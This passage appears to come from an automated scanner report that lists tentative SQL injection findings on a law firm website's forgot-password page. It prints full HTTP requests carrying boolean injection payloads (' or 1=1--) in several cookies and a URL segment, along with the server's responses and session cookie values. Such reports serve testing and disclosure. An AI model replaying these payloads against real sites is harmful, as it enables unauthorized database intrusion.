<script language="javascript" type="text/javascript" src="/scripts/jquery.validate.js"></script>
<script language="javascript" type="text/javascript">
   $(document).ready(function(){
       $('#emailform').validate();
   })
</script>
<script type="text/javascript">
<!--
_CF_checkemailform = function(_CF_this)
{
//reset on submit
_CF_error_exists = false;
_CF_error_messages = new Array();
_CF_error_fields = new Object();
_CF_FirstErrorField = null;


//display error messages and return success
if( _CF_error_exists )
{
if( _CF_error_messages.length > 0 )
{
// show alert() message

...[SNIP]...
1.46. http://www.pillsburylaw.com/connect_forgotpassword.cfm [MEDIAUSERNAME cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /connect_forgotpassword.cfm

Issue detail

The MEDIAUSERNAME cookie appears to be vulnerable to SQL injection attacks. The payloads 19507347'%20or%201%3d1--%20 and 19507347'%20or%201%3d2--%20 were each submitted in the MEDIAUSERNAME cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /connect_forgotpassword.cfm?p=99 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageID=99
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A44%3A27; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=19507347'%20or%201%3d1--%20; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 17:53:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: MEDIAUSERNAME=;expires=Wed, 12-May-2010 17:53:15 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /connect_forgotpassword.cfm?p=99 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageID=99
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A44%3A27; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=19507347'%20or%201%3d2--%20; __utmc=249287046

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Thu, 12 May 2011 17:53:15 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/scripts/masks.js"></script>

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<META NAME="robots" CONTENT="noindex,nofollow">
<title>Forgot Password</title>
<link href="/scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/sIFR-screen.css" type="text/css" media="screen" />
<link rel="stylesheet" href="/scripts/sIFR-print.css" type="text/css" media="print" />
<script language="javascript" type="text/javascript" src="/scripts/sifr.js"></script>
<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #F3F4F4;
   margin-left: 0px;
   margin-top: 0px;
}
-->
</style>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.validate.js"></script>
<script language="javascript" type="text/javascript">
   $(document).ready(function(){
       $('#emailform').validate();
   })
</script>
<script type="text/javascript">
<!--
_CF_checkemailform = function(_CF_this)
{
//reset on submit
_CF_error_exists = false;
_CF_error_messages = new Array();
_CF_error_fields = new Object();
_CF_FirstErrorField = null;


//display error messages and return success
if( _CF_error_exists )
{
if( _CF_error_messages.length > 0 )
{
// show alert() message

...[SNIP]...
1.47. http://www.pillsburylaw.com/connect_forgotpassword.cfm [PCONNECTID cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /connect_forgotpassword.cfm

Issue detail

The PCONNECTID cookie appears to be vulnerable to SQL injection attacks. The payloads 16640643'%20or%201%3d1--%20 and 16640643'%20or%201%3d2--%20 were each submitted in the PCONNECTID cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /connect_forgotpassword.cfm?p=99 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageID=99
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A44%3A27; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=16640643'%20or%201%3d1--%20; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 17:53:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: PCONNECTID=;expires=Wed, 12-May-2010 17:53:00 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /connect_forgotpassword.cfm?p=99 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageID=99
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A44%3A27; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=16640643'%20or%201%3d2--%20; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Thu, 12 May 2011 17:52:59 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/scripts/masks.js"></script>

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<META NAME="robots" CONTENT="noindex,nofollow">
<title>Forgot Password</title>
<link href="/scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/sIFR-screen.css" type="text/css" media="screen" />
<link rel="stylesheet" href="/scripts/sIFR-print.css" type="text/css" media="print" />
<script language="javascript" type="text/javascript" src="/scripts/sifr.js"></script>
<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #F3F4F4;
   margin-left: 0px;
   margin-top: 0px;
}
-->
</style>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.validate.js"></script>
<script language="javascript" type="text/javascript">
   $(document).ready(function(){
       $('#emailform').validate();
   })
</script>
<script type="text/javascript">
<!--
_CF_checkemailform = function(_CF_this)
{
//reset on submit
_CF_error_exists = false;
_CF_error_messages = new Array();
_CF_error_fields = new Object();
_CF_FirstErrorField = null;


//display error messages and return success
if( _CF_error_exists )
{
if( _CF_error_messages.length > 0 )
{
// show alert() message

...[SNIP]...
1.48. http://www.pillsburylaw.com/connect_forgotpassword.cfm [PCUSERNAME cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /connect_forgotpassword.cfm

Issue detail

The PCUSERNAME cookie appears to be vulnerable to SQL injection attacks. The payloads 12194880'%20or%201%3d1--%20 and 12194880'%20or%201%3d2--%20 were each submitted in the PCUSERNAME cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /connect_forgotpassword.cfm?p=99 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageID=99
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A44%3A27; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=12194880'%20or%201%3d1--%20; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 17:53:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: PCUSERNAME=;expires=Wed, 12-May-2010 17:53:05 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /connect_forgotpassword.cfm?p=99 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageID=99
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A44%3A27; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=12194880'%20or%201%3d2--%20; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Thu, 12 May 2011 17:53:05 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/scripts/masks.js"></script>

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<META NAME="robots" CONTENT="noindex,nofollow">
<title>Forgot Password</title>
<link href="/scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/sIFR-screen.css" type="text/css" media="screen" />
<link rel="stylesheet" href="/scripts/sIFR-print.css" type="text/css" media="print" />
<script language="javascript" type="text/javascript" src="/scripts/sifr.js"></script>
<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #F3F4F4;
   margin-left: 0px;
   margin-top: 0px;
}
-->
</style>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.validate.js"></script>
<script language="javascript" type="text/javascript">
   $(document).ready(function(){
       $('#emailform').validate();
   })
</script>
<script type="text/javascript">
<!--
_CF_checkemailform = function(_CF_this)
{
//reset on submit
_CF_error_exists = false;
_CF_error_messages = new Array();
_CF_error_fields = new Object();
_CF_FirstErrorField = null;


//display error messages and return success
if( _CF_error_exists )
{
if( _CF_error_messages.length > 0 )
{
// show alert() message

...[SNIP]...
1.49. http://www.pillsburylaw.com/connect_forgotpassword.cfm [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /connect_forgotpassword.cfm

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 15566183'%20or%201%3d1--%20 and 15566183'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /connect_forgotpassword.cfm15566183'%20or%201%3d1--%20?p=99 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageID=99
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A44%3A27; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Thu, 12 May 2011 17:53:32 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3homepage.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-right: 10px;
   margin-bottom: 10px;
}
-->
</style>
<!--[if IE]>
<style type="text/css">
bo
...[SNIP]...

Request 2

GET /connect_forgotpassword.cfm15566183'%20or%201%3d2--%20?p=99 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageID=99
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A44%3A27; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 2 (redirected)

HTTP/1.1 200 OK
Content-Length: 18948
Content-Type: text/html
Content-Location: http://www.pillsburylaw.com/404.htm
Last-Modified: Wed, 09 Feb 2011 21:25:38 GMT
Accept-Ranges: bytes
ETag: "b4792ae59fc8cb1:b91"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 17:53:32 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Pillsbury Law &gt; Page or File Not Found</title>
<META name="description" content="Pillsbury Winthrop Shaw Pittman">
<META name="keywords" content="">
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,
...[SNIP]...
1.50. http://www.pillsburylaw.com/connect_forgotpassword.cfm [__utma cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /connect_forgotpassword.cfm

Issue detail

The __utma cookie appears to be vulnerable to SQL injection attacks. The payloads 12242310'%20or%201%3d1--%20 and 12242310'%20or%201%3d2--%20 were each submitted in the __utma cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /connect_forgotpassword.cfm?p=99 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageID=99
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.312242310'%20or%201%3d1--%20; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A44%3A27; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 17:52:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: __UTMA=;expires=Wed, 12-May-2010 17:52:04 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /connect_forgotpassword.cfm?p=99 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageID=99
